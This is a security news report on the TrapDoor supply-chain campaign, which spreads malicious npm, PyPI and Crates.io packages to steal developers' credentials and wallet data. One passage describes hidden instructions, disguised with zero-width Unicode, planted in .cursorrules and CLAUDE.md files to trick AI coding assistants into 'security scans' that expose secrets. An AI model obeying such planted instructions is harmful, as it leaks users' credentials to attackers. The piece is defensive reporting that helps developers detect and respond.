Cybersecurity researchers have uncovered a seemingly sophisticated supply chain campaign referred to as TrapDoor, which deploys malicious packages across popular package registries to compromise developers working in cryptocurrency, decentralized finance (DeFi), artificial intelligence, and blockchain environments. The operation, first spotted on May 22, 2026, has rapidly spread through npm, PyPI, and Crates.io, affecting dozens of packages and hundreds of versions.
Security firm Socket identified over 34 malicious packages and more than 384 related versions. Attackers released them in coordinated waves using a small number of accounts.
These packages masquerade as legitimate development utilities—such as project setup tools, model routing helpers, prompt engineering libraries, Solidity assistants, and build utilities for Sui and Move languages.
This disguise makes them particularly attractive to developers in high-value ecosystems like Solana, Sui, and Aptos, who often install such tools during routine workflows.
The malware employs ecosystem-specific techniques for execution. On npm, many packages use post-install hooks to deploy a comprehensive JavaScript payload called trap-core.js.
This component scans local systems for sensitive information, validates stolen credentials against AWS and GitHub services, and establishes persistence through methods like cron jobs, systemd services, Git hooks, and custom configuration files.
It even attempts lateral movement by leveraging compromised SSH keys to access additional machines.
PyPI packages execute remote JavaScript payloads upon import, downloading code from attacker-controlled infrastructure.
This approach allows dynamic updates without republishing packages.
Meanwhile, Rust crates on Crates.io rely on malicious build.rs scripts that activate during compilation.
These specifically hunt for local keystores associated with Sui and Move development, encrypting harvested data with a hardcoded key before exfiltrating it.
Targeted data includes SSH keys, cryptocurrency wallet information (particularly for Solana, Sui, Aptos, Coinbase, Binance, and MetaMask), browser profiles, AWS credentials, GitHub tokens, API keys, and environment variables.
Such theft could enable not only direct wallet drains but also broader network compromises, repository access, and CI/CD pipeline breaches.
A notable innovation in TrapDoor involves AI development tools.
The malware plants hidden instructions in files like .cursorrules and CLAUDE.md—commonly used by assistants such as Cursor and Claude—using techniques like zero-width Unicode characters.
These prompts aim to trick AI coders into performing disguised “security scans” that expose additional secrets.
Attackers have also submitted pull requests to popular AI and developer projects (including LangChain) to propagate these configurations.
The campaign demonstrates evolving tactics in developer-targeted threats, blending traditional typosquatting with advanced persistence and AI manipulation.
Infrastructure links, including a GitHub account hosting payloads and documentation, tie the efforts together across platforms.
Developers are now being urged to carefully audit dependency lockfiles, review recent installations, rotate exposed credentials immediately from clean systems, and use security tools that scan for supply chain risks. As blockchain and AI development accelerate in the coming years, such incidents highlight the importance of verifying open-source dependencies.